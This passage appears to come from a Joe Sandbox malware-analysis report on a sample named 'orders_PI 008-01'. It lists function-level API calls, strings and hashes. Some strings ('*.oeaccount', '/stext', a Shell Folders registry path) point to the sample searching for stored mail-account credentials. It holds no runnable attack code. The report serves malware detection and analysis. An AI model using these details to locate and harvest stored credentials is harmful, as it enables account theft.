                                        • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                        • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                        Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 430 40baa0-40bab3 call 407e30 438 40bab5-40bac1 430->438 439 40bafa-40bb09 SetCursor 430->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->430 446->430 447->430 448->430 449->430
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Cursor_mbsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 882979914-1578091866
                                        • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                        • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                        • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                        • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                        Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                          • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                          • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                          • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                          • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                        Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                        • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                        • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                        • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProcProtectVirtual$HandleModule
                                        • String ID:
                                        • API String ID: 2152742572-0
                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                        Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75570A60,?,00000000), ref: 00410D1C
                                          • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                        • memset.MSVCRT ref: 00410E10
                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                        • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 889583718-2036018995
                                        • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                        • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                        • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                        • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                        Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                        • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                        • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                        • LockResource.KERNEL32(00000000), ref: 00410CA1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                        • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                        • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                        • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                        Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004109F7
                                          • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                          • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                        • memset.MSVCRT ref: 00410A32
                                        • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                        • String ID:
                                        • API String ID: 3143880245-0
                                        • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                        • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                        • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                        • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                        Function 00406F30 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • malloc.MSVCRT ref: 00406F4C
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                        • free.MSVCRT ref: 00406F6D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID: `Wu
                                        • API String ID: 3056473165-3261129705
                                        • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                        • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                        • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                        • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                        Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                        • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                        • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                        • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                        Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D5C
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D7A
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D98
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408DA8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                        • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                        • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                        • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                        Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                        • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFontIndirect_mbscpymemset
                                        • String ID: Arial
                                        • API String ID: 3853255127-493054409
                                        • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                        • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                        • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                        • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                        Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                        • _strcmpi.MSVCRT ref: 0040CEC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$_strcmpimemset
                                        • String ID: /stext
                                        • API String ID: 520177685-3817206916
                                        • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                        • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                        • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                        • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                        Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                        • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID:
                                        • API String ID: 145871493-0
                                        • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                        • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                        • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                        • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                        Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                          • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                          • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                          • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                        • String ID:
                                        • API String ID: 4165544737-0
                                        • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                        • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                        • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                        • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                        Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                        • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                        • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                        • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                        Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                        • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                        • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                        • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                        Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                        • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                        • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                        • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                        Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                        • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                        • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                        • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                        Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                        • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                        • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                        • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                        Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                        • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                        • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                        • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                        Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
